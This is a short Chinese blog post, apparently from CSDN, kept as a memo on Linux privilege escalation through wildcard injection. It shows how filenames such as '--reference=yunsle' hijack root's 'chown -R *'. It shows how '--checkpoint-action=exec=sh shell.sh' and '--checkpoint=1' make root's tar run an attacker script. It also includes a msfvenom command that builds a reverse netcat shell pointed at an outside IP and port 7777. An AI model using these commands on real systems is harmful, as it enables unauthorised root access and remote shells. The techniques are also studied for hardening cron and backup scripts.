linux 钓鱼,记录Linux下的钓鱼提权思路

以两个例子的形式进行记录,作为备忘:

0x01 Chown的--reference特性

存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?

文件中目前内容如下:

6bd57f4b2ddf5472d55162be752fa749.png

snipaste20180802_114639.png

攻击者yunsle在/home/test下创建两个文件,如下:

echo "">yunsle

echo > --reference=yunsle

e336565717e2af3f809acb3ed30f0cd4.png

snipaste20180802_114719.png

此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:

chown -R test:test *

9d65b1edbe7f24a4d9aae55181f48651.png

snipaste20180802_114751.png

虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:

eb51e5227f43239f7d84209206b56ca8.png

snipaste20180802_114819.png

0x02 tar的命令执行:--checkpoint-action&--checkpoint

存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。

如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。

攻击者首先自己可以生成一个反弹shell,如使用msfvenom:

msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R

96aac8a233d1509fd23b214819ee8ebb.png

snipaste20180802_114846.png

并且在接收机上监听7777端口:

dcb3e56daee09636cb666696ce208fd7.png

snipaste20180802_114917.png

将反弹shell内容在目标机上,写入shell.sh文件:

32e1e46867c2bbbccf557d2ba5426b37.png

snipaste20180802_114931.png

接下来再创建两个文件:

echo > "--checkpoint-action=exec=sh shell.sh"

echo > --checkpoint=1

dfc39b55277d8b2e01c3b5a9524a4cfa.png

snipaste20180802_114953.png

此时,root对当前目录执行类似如下的tar操作:

tar -zcf bak.tgz /home/test/*

d67acf9a2170c2acb2caced42f7ff7d6.png

snipaste20180802_115017.png

已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:

4be2fe30a01c2729a4efffea6945fd69.png

snipaste20180802_115034.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值